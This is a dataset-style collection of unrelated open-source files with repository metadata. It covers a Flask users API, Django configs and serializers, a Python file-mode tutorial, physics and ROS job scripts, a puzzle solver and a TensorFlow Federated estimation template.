                                ]
################################################################################
# Running the matching and setting the the trigger on
################################################################################
from PhysicsTools.PatAlgos.tools.trigTools import *
switchOnTrigger( process ) # This is optional and can be omitted.
switchOnTriggerMatching( process, triggerMatchers = [ 'mOniaTrigMatch'
                                                      ])
process.outpath = cms.EndPath(process.out)
| [
"kmtos@ucdavis.edu"
] | kmtos@ucdavis.edu |
8125e50786127c92c990c4260f700f56dd0cc45f | c274181853c53c3be24590bfb85605fa2da8c896 | /services/users/project/api/users.py | 5b9aaface633ab67bc9071f8c18118b864e8effb | [] | no_license | zxy-zxy/testdriven-app | 915861db6bb4e5cff975b45931299c81e392b699 | 5b15133032ccac9d97b52695b460418497511d14 | refs/heads/master | 2020-04-16T07:24:29.045575 | 2019-02-12T17:07:49 | 2019-02-12T17:07:49 | 148,199,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,944 | py | from flask import (
Blueprint,
jsonify,
request,
render_template,
)
from sqlalchemy import exc
from project.api.models import User
from project import db
from project.api.utils import authenticate, admin_required
# All user routes hang off this blueprint; templates are resolved from
# the package-local ``templates`` directory.
users_blueprint = Blueprint('users', __name__, template_folder='./templates')
@users_blueprint.route('/', methods=['GET', 'POST'])
def index():
    """Render the user list; a POST first creates a user from the form."""
    if request.method == 'POST':
        form = request.form
        db.session.add(User(
            username=form['username'],
            email=form['email'],
            password=form['password'],
        ))
        db.session.commit()
    return render_template('index.html', users=User.query.all())
@users_blueprint.route('/users/ping', methods=['GET'])
def ping_pong():
    """Liveness probe: always answers with a static success payload."""
    payload = {'status': 'success', 'message': 'pong!'}
    return jsonify(payload)
@users_blueprint.route('/users', methods=['POST'])
@authenticate
@admin_required
def add_user(resp):
    # ``resp`` is injected by the @authenticate decorator (presumably the
    # decoded token payload — defined in project.api.utils; confirm there).
    post_data = request.get_json()
    response_object = {
        'status': 'fail',
        'message': 'Invalid payload.'
    }
    if not post_data:
        return jsonify(response_object), 400
    username = post_data.get('username')
    email = post_data.get('email')
    password = post_data.get('password')
    try:
        # Reject duplicate registrations up front for a friendlier message
        # than the bare DB constraint failure.
        user = User.query.filter_by(email=email).first()
        if user:
            response_object['message'] = 'Sorry. That email already exists.'
            return jsonify(response_object), 400
        db.session.add(User(
            username=username,
            email=email,
            password=password, )
        )
        db.session.commit()
        response_object['status'] = 'success'
        response_object['message'] = f'{email} was added!'
        return jsonify(response_object), 201
    except (exc.IntegrityError, ValueError):
        # IntegrityError: constraint violation (e.g. duplicate race);
        # ValueError: bad field values.  Roll back so the session stays usable.
        db.session.rollback()
        return jsonify(response_object), 400
@users_blueprint.route('/users/<user_id>', methods=['GET'])
def get_single_user(user_id):
    """Return one user's details, or a 404 payload for bad/unknown ids."""
    error = {'status': 'fail', 'message': 'User does not exist.'}
    try:
        user = User.query.filter_by(id=int(user_id)).first()
        if user is None:
            return jsonify(error), 404
        payload = {
            'status': 'success',
            'data': {
                'id': user.id,
                'username': user.username,
                'email': user.email,
                'active': user.active
            }
        }
        return jsonify(payload), 200
    except ValueError:
        # a non-numeric user_id fails the int() conversion above
        return jsonify(error), 404
@users_blueprint.route('/users', methods=['GET'])
def get_all_users():
    """Return the full user list as JSON."""
    serialized = [user.to_json() for user in User.query.all()]
    return jsonify({'status': 'success', 'data': {'users': serialized}}), 200
| [
"sinitsinvanya@gmail.com"
] | sinitsinvanya@gmail.com |
4bc9f1a96de3486487f1c8d329a89abd9556f599 | d8461c32954a63f9f873ecd773d05f2827c8d19b | /kaikeba/AIPython基础/2.文件操作-文件打开的模式详解.py | 4551b46ad0bb28e1a03fc1d463121faed6e88a4e | [] | no_license | xidaodi/AILearn | a5426af12e8e7904fdf1c2074b31c7090f9b7bfd | a397d9dc055daf15d79e3e8e1d958126d6a4250d | refs/heads/master | 2023-03-26T21:20:47.718182 | 2021-03-31T09:14:05 | 2021-03-31T09:14:05 | 328,991,430 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,838 | py | # 。基础操作的方法
'''
1。打开文件 open()
参数1:文件路径
路径 url 统一资源定位符
相对路径: 就像给别人指路一样: 在某某大厦的对面。。。
针对文件的相对路径的表示,从当前目录开始计算
1.txt ==> 具体文件前没有任何表示时,默认为当前目录 和 ./1.txt 是一个位置
./1.txt ==> ./ 代表当前目录中的 1.txt
../1.txt ==> ../ 代表当前目录中的 上一级目录中的1.txt
绝对路径: 就像买东西写收货地址一样: 北京市海淀区中关村大街128号xxx小区,xxx号楼xx单元xx室
windows: c:/users/appdata/1.txt
Linux: /user/home/yc/1.txt
参数2:打开的方式
基础模式: w r x a
w w模式 write 写入模式
1。 文件如果不存在,则创建这个文件
2。 文件如果存在,则打开这个文件,并且清空文件内容
3。 文件打开后,文件的指针在文件的最前面
r r模式: read 读取模式
1。 如果文件不存在,则报错
2。 文件如果存在,则打开文件
3。 文件指针在文件的最前面
x x模式: xor 异或模式
1。文件不存在,则创建这个文件
2。文件已存在,则报错(防止覆盖)
3。文件的指针在文件的最前面
a a模式: append 追加模式
1。文件不存在,则创建文件
2。文件如果存在,则打开文件 (和w模式的区别在于。a模式打开文件后不会清空)
3。文件指针在当前文件的最后
扩展模式:
b b模式 bytes 二进制
+ +模式 plus 增强模式(可读可写)
文件操作模式的组合:
w,r,a,x
wb,rb,ab,xb,
w+,r+,a+,x+
wb+,rb+,ab+,xb+
参数 encoding 可选参数,设置文件的字符集,
如果是一个二进制的文件时,不需要设置字符集
encoding='utf-8'
'''
# 1. Open the file.
# BUG FIX: plain 'x' opens the file write-only, so the fp.read() below
# raised io.UnsupportedOperation.  'x+' keeps the exclusive-creation
# semantics while also making the handle readable.
fp = open('./1.txt', 'x+', encoding='utf-8')
# Opening a missing file with 'r' raises:
#FileNotFoundError: [Errno 2] No such file or directory: './2.txt'
# Opening an existing file with 'x' raises:
# FileExistsError: [Errno 17] File exists: './1.txt'
# 2. Read the file contents via read() (empty here: the file was just created).
res = fp.read()
print(res)
# 3. Close the file with close() to release the OS handle.
fp.close()
| [
"35069982+xidaodi@users.noreply.github.com"
] | 35069982+xidaodi@users.noreply.github.com |
cf088118d90ff342c3993518783e8407e3511bf7 | 494aad64e72ed100a884c8fcc8c0907ba399c178 | /articles/migrations/0003_auto_20200717_1531.py | 6342e5b845a1bd59c5b789be2fdbdfb8ce2b62a9 | [] | no_license | maziokey/Newspaper-App | 877fc904bcfe94952b139b3fee7f89d1aa42f601 | d2ed1a650a9d297533d6da90e7d96d27e91ff0a0 | refs/heads/master | 2022-11-18T03:13:25.185632 | 2020-07-17T14:56:50 | 2020-07-17T14:56:50 | 280,452,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # Generated by Django 3.0.8 on 2020-07-17 14:31
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated Django migration: re-declares Comment.article as a
    # cascading ForeignKey with the reverse accessor ``comments``.
    dependencies = [
        ('articles', '0002_comment'),
    ]
    operations = [
        migrations.AlterField(
            model_name='comment',
            name='article',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='articles.Article'),
        ),
    ]
| [
"okeyluvsu2004@yahoo.com"
] | okeyluvsu2004@yahoo.com |
b15a2ac36edb6d4bc35cb3bfda2ab22bb4447a1b | 29e91d422f0fcad92f0e25b3dbb9efd39dc01162 | /electronic-station/one-line-drawing.py | 25bfea7dd9668580298643bce015ab26a2f3780c | [] | no_license | cielavenir/checkio | c206410b7d8d368e80ad0f66f6314097bd900bcd | e2dfcdef75cd68ca3cced159225b5433570bd85b | refs/heads/master | 2021-01-22T20:34:29.899146 | 2018-02-22T15:16:21 | 2018-02-22T15:16:21 | 85,328,995 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,020 | py | from collections import defaultdict
def dfs(roads,cur,points,num):
    # Backtracking search for a one-stroke (Euler) path.
    #   roads  -- sorted [p, q] segments already used on the current path
    #   cur    -- current vertex, an (x, y) tuple
    #   points -- adjacency map: vertex -> list of neighbour vertices
    #   num    -- per-vertex bookkeeping counter, shared and mutated in
    #             place (+2 while an edge into the vertex is being tried,
    #             restored on backtrack)
    for nxt in points[cur]:
        num[nxt]+=2
        cur_road=list(sorted([cur,nxt]))
        r=None
        # Recurse only if nxt still has capacity and this exact segment
        # has not been drawn yet.
        if num[nxt]<=len(points[nxt]) and cur_road not in roads:
            r=dfs(roads+[cur_road],nxt,points,num)
        num[nxt]-=2
        if r!=None: return [cur]+r
    # Success when every vertex's counter matches its degree, i.e. all
    # incident edges have been used.
    if all(len(points[e])==num[e] for e in points): return [cur]
def draw(segments):
    # Find a single-stroke path covering every segment.  ``segments`` is
    # a set of (x1, y1, x2, y2) 4-tuples; returns a list of (x, y)
    # points, or an empty/None result when no one-line drawing exists.
    points={}
    for _p in segments:
        p,q=((_p[0],_p[1]),(_p[2],_p[3]))
        if p not in points: points[p]=[]
        if q not in points: points[q]=[]
        points[p].append(q)
        points[q].append(p)
    # An Euler path exists only with zero or exactly two odd-degree vertices.
    odd=[]
    for p in points:
        if len(points[p])%2==1: odd.append(p)
    if 1==len(odd) or 2<len(odd): return []
    # Start/end at the odd vertices when present, otherwise anywhere
    # (``q`` still holds the last vertex seen in the loop above).
    cur,end=(odd[0],odd[1]) if odd else (q,q)
    num=defaultdict(int)
    num[cur]+=1
    num[end]-=1
    # Try each neighbour of the start vertex as the first step.
    for nxt in points[cur]:
        num[nxt]+=2
        r=None
        if num[nxt]<=len(points[nxt]):
            r=dfs([list(sorted([cur,nxt]))],nxt,points,num)
        num[nxt]-=2
        if r!=None: return [cur]+r
if __name__ == '__main__':
    # checker replays the point sequence returned by ``func`` and ticks
    # off each consecutive pair against the expected segment set.
    def checker(func, in_data, is_possible=True):
        user_result = func(in_data)
        if not is_possible:
            if user_result:
                print("How did you draw this?")
                return False
            else:
                return True
        if len(user_result) < 2:
            print("More points please.")
            return False
        data = list(in_data)
        for i in range(len(user_result) - 1):
            f, s = user_result[i], user_result[i + 1]
            # f + s concatenates two (x, y) points into a 4-tuple segment;
            # accept the segment in either orientation.
            if (f + s) in data:
                data.remove(f + s)
            elif (s + f) in data:
                data.remove(s + f)
            else:
                print("The wrong segment {}.".format(f + s))
                return False
        if data:
            print("You forgot about {}.".format(data[0]))
            return False
        return True
    assert checker(draw,
                   {(1, 2, 1, 5), (1, 2, 7, 2), (1, 5, 4, 7), (4, 7, 7, 5)}), "Example 1"
    assert checker(draw,
                   {(1, 2, 1, 5), (1, 2, 7, 2), (1, 5, 4, 7),
                    (4, 7, 7, 5), (7, 5, 7, 2), (1, 5, 7, 2), (7, 5, 1, 2)},
                   False), "Example 2"
    assert checker(draw,
                   {(1, 2, 1, 5), (1, 2, 7, 2), (1, 5, 4, 7), (4, 7, 7, 5),
(7, 5, 7, 2), (1, 5, 7, 2), (7, 5, 1, 2), (1, 5, 7, 5)}), "Example 3" | [
"cielartisan@gmail.com"
] | cielartisan@gmail.com |
0ecb7644f9cfbe85cb7f88894fc8700507809cf4 | d3384a81207c1b6cfd0ff304694fec93727a6771 | /dogapp/urls.py | a94e9012c49417f9f7fa3f525881ae1262045f51 | [] | no_license | jucie15/dogapp | 5b36b4032b7af35ef86da49005602a51bceb5eb6 | 1f8be7c704c36d98474fedd327490a3220a704c0 | refs/heads/master | 2021-01-02T22:52:15.729043 | 2017-08-05T22:30:43 | 2017-08-05T22:30:43 | 99,407,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 998 | py | """dogapp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf import settings
from django.conf.urls import url, include
from django.conf.urls.static import static
from django.contrib import admin
# Route table: Django admin plus the ``matching`` app (namespaced).
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^matching/', include('matching.urls', namespace='matching')),
]
# Serve user-uploaded media files (the static() helper from
# django.conf.urls.static builds the MEDIA_URL route).
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"jucie15@nate.com"
] | jucie15@nate.com |
d01c453bb0a1eb84cc26061f47cf2668a51900bd | f546b54b3d5120b7cc5bce9a3ec07b4c380548e9 | /calm/dsl/decompile/file_handler.py | e5fee6019f30547d01b63eae04905d36e9f4a14f | [
"Apache-2.0"
] | permissive | gabybeitler/calm-dsl | 000c1861fbaa061243e78f24bc25d6fdbca9a5d0 | bac453413cfcf800eef95d89d5a7323c83654a93 | refs/heads/master | 2021-07-14T09:00:47.938284 | 2021-03-02T14:43:13 | 2021-03-02T14:43:13 | 238,353,395 | 1 | 0 | null | 2020-02-05T02:42:06 | 2020-02-05T02:42:05 | null | UTF-8 | Python | false | false | 1,373 | py | import os
# Module-level cache of the blueprint directory layout; populated by
# ``init_bp_dir`` and cleared by ``init_file_globals``.
LOCAL_DIR = None
SCRIPTS_DIR = None
SPECS_DIR = None
BP_DIR = None

# Fixed sub-directory names inside a decompiled blueprint.
LOCAL_DIR_KEY = ".local"
SCRIPTS_DIR_KEY = "scripts"
SPECS_DIR_KEY = "specs"


def make_bp_dirs(bp_dir):
    """Create the blueprint directory skeleton under *bp_dir*.

    Returns the tuple ``(bp_dir, local_dir, spec_dir, scripts_dir)``.
    """
    local_dir = os.path.join(bp_dir, LOCAL_DIR_KEY)
    spec_dir = os.path.join(bp_dir, SPECS_DIR_KEY)
    scripts_dir = os.path.join(bp_dir, SCRIPTS_DIR_KEY)
    for path in (bp_dir, local_dir, spec_dir, scripts_dir):
        # exist_ok=True replaces the racy isdir()-then-makedirs() pattern:
        # it is a no-op when the directory already exists.
        os.makedirs(path, exist_ok=True)
    return (bp_dir, local_dir, spec_dir, scripts_dir)
def init_bp_dir(bp_dir):
    # Create the directory tree and cache the paths in module globals
    # for the get_*() accessors below.
    global LOCAL_DIR, SCRIPTS_DIR, SPECS_DIR, BP_DIR
    BP_DIR, LOCAL_DIR, SPECS_DIR, SCRIPTS_DIR = make_bp_dirs(bp_dir)
    return (BP_DIR, LOCAL_DIR, SPECS_DIR, SCRIPTS_DIR)
# Read-only accessors for the module-level path cache populated by
# ``init_bp_dir`` (the *_KEY constants are the static directory names).
def get_bp_dir():
    return BP_DIR
def get_local_dir():
    return LOCAL_DIR
def get_specs_dir():
    return SPECS_DIR
def get_scripts_dir():
    return SCRIPTS_DIR
def get_local_dir_key():
    return LOCAL_DIR_KEY
def get_specs_dir_key():
    return SPECS_DIR_KEY
def get_scripts_dir_key():
    return SCRIPTS_DIR_KEY
def init_file_globals():
    # Reset the cached paths (e.g. between successive decompile runs).
    global LOCAL_DIR, SPECS_DIR, SCRIPTS_DIR, BP_DIR
    LOCAL_DIR = None
    SCRIPTS_DIR = None
    SPECS_DIR = None
    BP_DIR = None
| [
"abhijeet.kaurav@nutanix.com"
] | abhijeet.kaurav@nutanix.com |
199a1a6fc8c42b985e005e6a0104dca9e08dbc43 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/421/usersdata/314/87426/submittedfiles/tomadas.py | 182732d078103dd723da0646a6f90c8d7964ae31 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | # -*- coding: utf-8 -*-
import math
#COMECE SEU CODIGO AQUI
t1=int(input('digite t1: '))
t2=int(input('digite t2: '))
t3=int(input('digite t3: '))
t4=int(input('digite t4: '))
for i in range(0,5,1):
while(t1<1 or t2<1 or t3<1 or t4<1):
t1=int(input('digite t1: '))
t2=int(input('digite t2: '))
t3=int(input('digite t3: '))
t4=int(input('digite t4: '))
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
c5e990b0199da83f612a0fa4ac1be8b4bb1546e9 | b0cc185ca50618c64caf97821eda6f264a917a75 | /setup.py | 01cbe2eb3d6531de5dfbc6a7cb6c3e06f9349618 | [] | no_license | AztecSmith/PyEngineIO-Client | fa77ae11a17613b6d27f1de132baa591c7e4a808 | e2c6fcfc6bba4b8c36090ec4629300856aa5d929 | refs/heads/master | 2021-05-27T16:12:04.923656 | 2014-09-30T23:38:51 | 2014-09-30T23:38:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 681 | py | from setuptools import setup, find_packages
setup(
name='PyEngineIO-Client',
version='1.2.1.1-beta',
url='http://github.com/fuzeman/PyEngineIO-Client/',
author='Dean Gardiner',
author_email='me@dgardiner.net',
description='Client for engine.io',
packages=find_packages(),
platforms='any',
install_requires=[
'PyEmitter',
'PyEngineIO-Parser',
'requests',
'requests-futures',
'websocket-client'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python'
],
)
| [
"gardiner91@gmail.com"
] | gardiner91@gmail.com |
c70332e8ef33875d1f0ec48efb4f286ba2021f3a | 4cdc90a76a5766cff1bcb297bd7ffc038f5c537a | /backend/api/user_auth/serializers.py | b10592f0591018930a0d0dec78e2ca21cbed9fcb | [] | no_license | gnsaddy/djangocicd | 62fca94d4fbb52ac1ffef21cbde6195aa7e9101e | 8b49c2777ff4e2c8cf1b27f76ae1d1efdb924d8b | refs/heads/main | 2023-06-23T21:32:07.681197 | 2021-07-16T15:48:44 | 2021-07-16T15:48:44 | 386,282,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,161 | py | from django.contrib import auth
from django.contrib.auth.models import update_last_login
from rest_framework.response import Response
from rest_framework_simplejwt.exceptions import TokenError, AuthenticationFailed
from rest_framework_simplejwt.serializers import TokenObtainPairSerializer
from rest_framework_simplejwt.settings import api_settings
from rest_framework_simplejwt.tokens import RefreshToken
from .models import CustomUser, StudentModel, FacultyModel
from rest_framework import serializers, status
from django.contrib.auth import password_validation
from rest_framework.decorators import authentication_classes, permission_classes
class StudentSerializers(serializers.HyperlinkedModelSerializer):
def create(self, validated_data):
password = validated_data.pop('password', None)
instance = self.Meta.model(**validated_data)
if password is not None:
instance.set_password(password)
instance.save()
return instance
def update(self, instance, validated_data):
for attr, value in validated_data.items():
if attr == 'password':
instance.set_password(value)
else:
setattr(instance, attr, value)
instance.save()
return instance
class Meta:
model = StudentModel
extra_kwargs = {
'password': {
'write_only': True
}
}
fields = ('id', 'sid', 'first_name', 'last_name', 'email', 'password', 'student_phone',
'picture', 'gender', 'student_grade', 'student_school', 'student_college', 'student_city',
'student_state', 'student_country', 'student_parent_name', 'student_parent_email',
'student_parent_phone', 'created_at', 'student_date_joined', 'student'
)
class MyTokenObtainPairSerializer(TokenObtainPairSerializer):
def create(self, validated_data):
pass
def update(self, instance, validated_data):
pass
@classmethod
def get_token(cls, user):
token = super().get_token(user)
# Add custom claims
token['email'] = user.email
return token
def validate(self, attrs):
data = super().validate(attrs)
data['email'] = self.user.email
data['first_name'] = self.user.first_name
data['last_name'] = self.user.last_name
if api_settings.UPDATE_LAST_LOGIN:
update_last_login(None, self.user)
return data
class LogoutSerializer(serializers.Serializer):
def update(self, instance, validated_data):
pass
def create(self, validated_data):
pass
refresh = serializers.CharField()
default_error_message = {
'bad_token': 'Token is expired or invalid'
}
def validate(self, attrs):
self.token = attrs['refresh']
return attrs
def save(self, **kwargs):
try:
RefreshToken(self.token).blacklist()
except TokenError:
self.fail('bad_token')
| [
"aditya.x510@gmail.com"
] | aditya.x510@gmail.com |
3582fa376bc661315a7806f49fbd0525d5029316 | 53e58c213232e02250e64f48b97403ca86cd02f9 | /16/mc/ExoDiBosonResonances/EDBRTreeMaker/test/crab3_analysisM2500_R_0-4.py | 656892fc959de47eea0dd5f18dd926abc1651b8e | [] | no_license | xdlyu/fullRunII_ntuple_102X | 32e79c3bbc704cfaa00c67ab5124d40627fdacaf | d420b83eb9626a8ff1c79af5d34779cb805d57d8 | refs/heads/master | 2020-12-23T15:39:35.938678 | 2020-05-01T14:41:38 | 2020-05-01T14:41:38 | 237,192,426 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,303 | py | from WMCore.Configuration import Configuration
name = 'WWW/sig'
steam_dir = 'xulyu'
config = Configuration()
config.section_("General")
config.General.requestName = 'M2500_R0-4_off'
config.General.transferLogs = True
config.section_("JobType")
config.JobType.pluginName = 'Analysis'
config.JobType.inputFiles = ['Summer16_07Aug2017_V11_MC_L1FastJet_AK4PFchs.txt','Summer16_07Aug2017_V11_MC_L2Relative_AK4PFchs.txt','Summer16_07Aug2017_V11_MC_L3Absolute_AK4PFchs.txt','Summer16_07Aug2017_V11_MC_L1FastJet_AK8PFchs.txt','Summer16_07Aug2017_V11_MC_L2Relative_AK8PFchs.txt','Summer16_07Aug2017_V11_MC_L3Absolute_AK8PFchs.txt','Summer16_07Aug2017_V11_MC_L1FastJet_AK8PFPuppi.txt','Summer16_07Aug2017_V11_MC_L2Relative_AK8PFPuppi.txt','Summer16_07Aug2017_V11_MC_L3Absolute_AK8PFPuppi.txt','Summer16_07Aug2017_V11_MC_L1FastJet_AK4PFPuppi.txt','Summer16_07Aug2017_V11_MC_L2Relative_AK4PFPuppi.txt','Summer16_07Aug2017_V11_MC_L3Absolute_AK4PFPuppi.txt']
#config.JobType.inputFiles = ['PHYS14_25_V2_All_L1FastJet_AK4PFchs.txt','PHYS14_25_V2_All_L2Relative_AK4PFchs.txt','PHYS14_25_V2_All_L3Absolute_AK4PFchs.txt','PHYS14_25_V2_All_L1FastJet_AK8PFchs.txt','PHYS14_25_V2_All_L2Relative_AK8PFchs.txt','PHYS14_25_V2_All_L3Absolute_AK8PFchs.txt']
# Name of the CMSSW configuration file
#config.JobType.psetName = 'bkg_ana.py'
config.JobType.psetName = 'analysis_sig.py'
#config.JobType.allowUndistributedCMSSW = True
config.JobType.allowUndistributedCMSSW = True
config.section_("Data")
#config.Data.inputDataset = '/WJetsToLNu_13TeV-madgraph-pythia8-tauola/Phys14DR-PU20bx25_PHYS14_25_V1-v1/MINIAODSIM'
config.Data.inputDataset = '/WkkToWRadionToWWW_M2500-R0-4-TuneCUETP8M1_13TeV-madgraph-pythia/RunIISummer16MiniAODv3-PUMoriond17_94X_mcRun2_asymptotic_v3-v1/MINIAODSIM'
#config.Data.inputDBS = 'global'
config.Data.inputDBS = 'global'
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob =5
config.Data.totalUnits = -1
config.Data.publication = False
config.Data.outLFNDirBase = '/store/group/dpg_trigger/comm_trigger/TriggerStudiesGroup/STEAM/' + steam_dir + '/' + name + '/'
# This string is used to construct the output dataset name
config.Data.outputDatasetTag = 'M2500_R0-4_off'
config.section_("Site")
# Where the output files will be transmitted to
config.Site.storageSite = 'T2_CH_CERN'
| [
"XXX@cern.ch"
] | XXX@cern.ch |
c9dfde608b02ae4645c4a7b55b829cd7113669f6 | a8278268c366567e92e7e42cbd00ac6dc1c7ca8a | /tensorflow_federated/python/core/templates/estimation_process.py | 81051fb96fc071ee2344f7cd4c896382092cdaa5 | [
"Apache-2.0"
] | permissive | tianya3796/federated | 4e743b98912f9890a9d70af6817f3671e5cdd4b9 | 2abc58ad767f119f3f498900f3fffa68e5198c60 | refs/heads/master | 2022-12-27T19:18:11.798188 | 2020-10-09T00:36:41 | 2020-10-09T00:37:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,304 | py | # Copyright 2020, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines a template for a process that maintains an estimate."""
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.core.api import computation_base
from tensorflow_federated.python.core.api import computations
from tensorflow_federated.python.core.templates import errors
from tensorflow_federated.python.core.templates import iterative_process
class EstimationProcess(iterative_process.IterativeProcess):
"""A `tff.templates.IterativeProcess that maintains an estimate.
In addition to the `initialize` and `next` functions provided by an
`IterativeProcess`, an `EstimationProcess` has a `get_estimate` function that
returns the result of some computation on the process state. The argument
of `get_estimate` must be of the same type as the state, that is, the type
of object returned by `initialize`.
"""
def __init__(self, initialize_fn: computation_base.Computation,
next_fn: computation_base.Computation,
get_estimate_fn: computation_base.Computation):
super().__init__(initialize_fn, next_fn)
py_typecheck.check_type(get_estimate_fn, computation_base.Computation)
estimate_fn_arg_type = get_estimate_fn.type_signature.parameter
if not estimate_fn_arg_type.is_assignable_from(self.state_type):
raise errors.TemplateStateNotAssignableError(
f'The state type of the process must be assignable to the '
f'input argument of `get_estimate_fn`, but the state type is: '
f'{self.state_type}\n'
f'and the argument of `get_estimate_fn` is:\n'
f'{estimate_fn_arg_type}')
self._get_estimate_fn = get_estimate_fn
@property
def get_estimate(self) -> computation_base.Computation:
"""A `tff.Computation` that computes the current estimate from `state`.
Given a `state` controlled by this process, computes and returns the most
recent estimate of the estimated quantity.
Note that this computation operates on types without placements, and thus
can be used with `state` residing either on `SERVER` or `CLIENTS`.
Returns:
A `tff.Computation`.
"""
return self._get_estimate_fn
def apply(transform_fn: computation_base.Computation,
arg_process: EstimationProcess):
"""Builds an `EstimationProcess` by applying `transform_fn` to `arg_process`.
Args:
transform_fn: A `computation_base.Computation` to apply to the estimate of
the arg_process.
arg_process: An `EstimationProcess` to which the transformation will be
applied.
Returns:
An estimation process that applies `transform_fn` to the result of calling
`arg_process.get_estimate`.
"""
py_typecheck.check_type(transform_fn, computation_base.Computation)
py_typecheck.check_type(arg_process, EstimationProcess)
arg_process_estimate_type = arg_process.get_estimate.type_signature.result
transform_fn_arg_type = transform_fn.type_signature.parameter
if not transform_fn_arg_type.is_assignable_from(arg_process_estimate_type):
raise errors.TemplateStateNotAssignableError(
f'The return type of `get_estimate` of `arg_process` must be '
f'assignable to the input argument of `transform_fn`, but '
f'`get_estimate` returns type:\n{arg_process_estimate_type}\n'
f'and the argument of `transform_fn` is:\n'
f'{transform_fn_arg_type}')
transformed_estimate_fn = computations.tf_computation(
lambda state: transform_fn(arg_process.get_estimate(state)),
arg_process.state_type)
return EstimationProcess(
initialize_fn=arg_process.initialize,
next_fn=arg_process.next,
get_estimate_fn=transformed_estimate_fn)
| [
"tensorflow.copybara@gmail.com"
] | tensorflow.copybara@gmail.com |
8bdb6e215d3fe86a475a3531cf47a6603d0345ca | a5b4d77e760c6131ba1c5f040265a3b08d3c0478 | /enemy_bot/enemy_bot_level8/burger_war/scripts/service_client.py | 0e7341b568e443d724b5aee09e1b16dfaceca475 | [
"BSD-3-Clause"
] | permissive | kenjirotorii/burger_war_kit | 700b511739299a9d90d23c70262ecf4856d234b7 | d9b1b443f220980a4118c13cdf22174696c3db9c | refs/heads/main | 2023-03-21T23:32:24.415502 | 2021-03-11T15:59:12 | 2021-03-11T15:59:12 | 337,704,943 | 0 | 1 | BSD-3-Clause | 2021-03-11T15:59:13 | 2021-02-10T11:36:22 | Python | UTF-8 | Python | false | false | 301 | py | import rospy
from std_srvs.srv import Empty
import time
if __name__ == "__main__":
rospy.wait_for_service("service_call")
service_call = rospy.ServiceProxy("service_call",Empty)
while True:
# 1秒に1回サービスで通信
service_call()
time.sleep(1)
| [
"you@example.com"
] | you@example.com |
07d846906c2039c3f58ea3d83909a09000239748 | b76615ff745c6d66803506251c3d4109faf50802 | /pyobjc-framework-DeviceCheck/setup.py | 3f9d906f3f61730f361afa0e45f1397c1622cbf2 | [
"MIT"
] | permissive | danchr/pyobjc-git | 6ef17e472f54251e283a0801ce29e9eff9c20ac0 | 62b787fddeb381184043c7ff136f1c480755ab69 | refs/heads/master | 2021-01-04T12:24:31.581750 | 2020-02-02T20:43:02 | 2020-02-02T20:43:02 | 240,537,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | """
Wrappers for the "DeviceCheck" framework on macOS 10.15 and later.
These wrappers don't include documentation, please check Apple's documention
for information on how to use this framework and PyObjC's documentation
for general tips and tricks regarding the translation between Python
and (Objective-)C frameworks
"""
from pyobjc_setup import setup
import os
VERSION = "6.2b1"
setup(
name="pyobjc-framework-DeviceCheck",
description="Wrappers for the framework DeviceCheck on macOS",
min_os_level="10.15",
packages=["DeviceCheck"],
version=VERSION,
install_requires=["pyobjc-core>=" + VERSION, "pyobjc-framework-Cocoa>=" + VERSION],
long_description=__doc__,
)
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
5774d3706ab207616029b0bacdc9d82ca94adb58 | ceead28beb1ea6cb56a2bb4472bc1d2396b39e6f | /gen_basis_helpers/analyse_md/std_stats.py | 2cc870c2ead0d8574f15f0ef23ac77a1b049285f | [] | no_license | RFogarty1/plato_gen_basis_helpers | 9df975d4198bff7bef80316527a8086b6819d8ab | 8469a51c1580b923ca35a56811e92c065b424d68 | refs/heads/master | 2022-06-02T11:01:37.759276 | 2022-05-11T12:57:40 | 2022-05-11T12:57:40 | 192,934,403 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,328 | py |
import math
def calcStandardErrorOfMeanForUncorrelatedData(stdDev, nSamples):
